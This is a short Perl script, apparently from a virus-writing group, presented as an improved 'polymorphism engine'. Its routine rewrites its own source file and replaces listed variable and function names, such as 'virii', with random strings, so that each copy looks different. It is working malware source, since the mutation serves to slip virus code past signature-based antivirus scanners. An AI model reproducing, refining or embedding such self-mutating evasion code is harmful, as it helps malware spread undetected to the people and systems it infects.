# Polymorphism enginge by Perforin with some improvements
#  - uses also numbers for new names
#  - can also change function names
#  - works with arrays (easier to add new variable or funktion names to change)
#
# main idea by Perforin
#
# written by R3s1stanc3 [vxnetw0rk]

sub varchange
{
	@case = ("A".."Z","a".."z","0".."9");
	@change = ("case", "change", "var", "myself", "line", "varchange", "virii", "count");
	@var;
	for ($count = 0;$count < scalar(@change); $count++){
		$var[$count] = $case[int(rand(52))].$case[int(rand(62))].$case[int(rand(62))].$case[int(rand(62))].$case[int(rand(62))];
	}
	open(virii, "<", "$0");
	@myself = <virii>;
	close(virii);
	open(virii, ">", "$0");
	foreach $line (@myself){
		for($count = 0; $count < scalar(@change); $count++){
			while ($line =~ /$change[$count]/){
				$line =~ s/$change[$count]/$var[$count]/;
			}		
		}
		print virii $line;
	}
	close(virii);
}

